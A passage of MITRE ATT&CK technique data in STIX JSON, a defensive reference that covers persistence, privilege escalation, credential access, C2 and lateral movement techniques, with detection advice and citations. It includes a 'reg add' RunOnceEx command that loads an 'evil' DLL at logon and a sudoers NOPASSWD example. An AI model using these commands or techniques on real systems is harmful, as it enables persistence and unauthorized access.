for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["John Lambert, Microsoft Threat Intelligence Center", "Mohit Rathore"], "x_mitre_deprecated": false, "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS", "Azure AD"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1212", "external_id": "T1212"}, {"source_name": "Bugcrowd Replay Attack", "description": "Bugcrowd. (n.d.). Replay Attack. Retrieved September 27, 2023.", "url": "https://www.bugcrowd.com/glossary/replay-attack/"}, {"source_name": "Comparitech Replay Attack", "description": "Justin Schamotta. (2022, October 28). What is a replay attack?. Retrieved September 27, 2023.", "url": "https://www.comparitech.com/blog/information-security/what-is-a-replay-attack/"}, {"source_name": "ADSecurity Detecting Forged Tickets", "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", "url": "https://adsecurity.org/?p=1515"}, {"source_name": "Storm-0558 techniques for unauthorized email access", "description": "Microsoft Threat Intelligence. (2023, July 14). Analysis of Storm-0558 techniques for unauthorized email access. Retrieved September 18, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/"}, {"source_name": "Microsoft Midnight Blizzard Replay Attack", "description": "Microsoft Threat Intelligence. (2023, June 21). Credential Attacks. Retrieved September 27, 2023.", "url": "https://twitter.com/MsftSecIntel/status/1671579359994343425"}, {"source_name": "Technet MS14-068", "description": "Microsoft. (2014, November 18). Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780). Retrieved December 23, 2015.", "url": "https://technet.microsoft.com/en-us/library/security/ms14-068.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Emond", "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ivan Sinyakov"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor emond rules creation by checking for files created or modified in /etc/emond.d/rules/ and /private/var/db/emondClients.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", "created": "2020-01-24T15:15:13.426Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/014", "external_id": "T1546.014"}, {"source_name": "magnusviri emond Apr 2016", "description": "Reynolds, James. (2016, April 7). What is emond?. Retrieved September 10, 2019.", "url": "http://www.magnusviri.com/Mac/what-is-emond.html"}, {"source_name": "xorrior emond Jan 2018", "description": "Ross, Chris. (2018, January 17). Leveraging Emond on macOS For Persistence. Retrieved September 10, 2019.", "url": "https://www.xorrior.com/emond-persistence/"}, {"source_name": "sentinelone macos persist Jun 2019", "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "One-Way Communication", "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", "created": "2020-03-14T22:45:52.963Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1102/003", "external_id": "T1102.003"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Gather Victim Network Information", "description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "created": "2020-10-02T15:45:17.628Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590", "external_id": "T1590"}, {"source_name": "WHOIS", "description": "NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.", "url": "https://www.whois.net/"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}, {"source_name": "Circl Passive DNS", "description": "CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.", "url": "https://www.circl.lu/services/passive-dns/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Exploitation of Remote Services", "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["ExtraHop"], "x_mitre_detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of [Discovery](https://attack.mitre.org/tactics/TA0007), or other unusual network traffic that may indicate additional tools transferred to the system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["Unpatched software or otherwise vulnerable target. Depending on the target and goal, the system and exploitable service may need to be remotely accessible from the internal network."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1210", "external_id": "T1210"}, {"source_name": "CIS Multiple SMB Vulnerabilities", "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", "url": "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/"}, {"source_name": "NVD CVE-2017-0176", "description": "National Vulnerability Database. (2017, June 22). CVE-2017-0176 Detail. Retrieved April 3, 2018.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-0176"}, {"source_name": "NVD CVE-2016-6662", "description": "National Vulnerability Database. (2017, February 2). CVE-2016-6662 Detail. Retrieved April 3, 2018.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662"}, {"source_name": "NVD CVE-2014-7169", "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Parent PID Spoofing", "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via VBA [Scripting](https://attack.mitre.org/techniques/T1064) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) (given appropriate access rights to the parent process). For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Wayne Silva, F-Secure Countercept"], "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Host forensic analysis", "Heuristic Detection"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9ddc2534-e91c-4dab-a8f6-43dab81e8142", "created": "2019-06-03T14:50:50.613Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1502", "external_id": "T1502"}, {"source_name": "DidierStevens SelectMyParent Nov 2009", "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.", "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/"}, {"source_name": "Microsoft UAC Nov 2018", "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.", "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works"}, {"source_name": "CounterCept PPID Spoofing Dec 2018", "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.", "url": "https://www.countercept.com/blog/detecting-parent-pid-spoofing/"}, {"source_name": "CTD PPID Spoofing Macro Mar 2019", "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.", "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/"}, {"source_name": "XPNSec PPID Nov 2017", "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.", "url": "https://blog.xpnsec.com/becoming-system/"}, {"source_name": "Microsoft Process Creation Flags May 2018", "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.", "url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags"}, {"source_name": "Secuirtyinbits Ataware3 May 2019", "description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.", "url": "https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Keychain", "description": "Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\n\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user\u2019s logon credentials.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9e09ddb2-1746-4448-9cad-7f8b41777d6d", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1142", "external_id": "T1142"}, {"source_name": "Wikipedia keychain", "description": "Wikipedia. (n.d.). Keychain (software). Retrieved July 5, 2017.", "url": "https://en.wikipedia.org/wiki/Keychain_(software)"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-02-16T13:09:39.215Z", "name": "Internal Spearphishing", "description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim MalcomVetter", "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"], "x_mitre_deprecated": false, "x_mitre_detection": "Network intrusion detection systems and email gateways usually do not scan internal email, but an organization can leverage the journaling-based solution which sends a copy of emails to a security service for offline analysis or incorporate service-integrated solutions using on-premise or API-based integrations to help detect internal spearphishing campaigns.(Citation: Trend Micro When Phishing Starts from the Inside 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", "created": "2019-09-04T19:26:12.441Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1534", "external_id": "T1534"}, {"source_name": "Trend Micro When Phishing Starts from the Inside 2017", "description": "Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.", "url": "https://blog.trendmicro.com/phishing-starts-inside/"}, {"source_name": "Int SP - chat apps", "description": "Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.", "url": "https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/"}, {"source_name": "Trend Micro - Int SP", "description": "Trend Micro. (n.d.). Retrieved February 16, 2024.", "url": "https://www.trendmicro.com/en_us/research.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Sudo", "description": "The sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL (Citation: OSX.Dok Malware). \n\nAdversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["root"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9e80ddfb-ce32-4961-a778-ca6a10cfae72", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1169", "external_id": "T1169"}, {"source_name": "OSX.Dok Malware", "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Services File Permissions Weakness", "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Stefan Kanthak"], "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["SYSTEM", "Administrator", "User"], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "created": "2020-03-12T20:43:53.998Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/010", "external_id": "T1574.010"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-16T09:08:22.319Z", "name": "Registry Run Keys / Startup Folder", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is 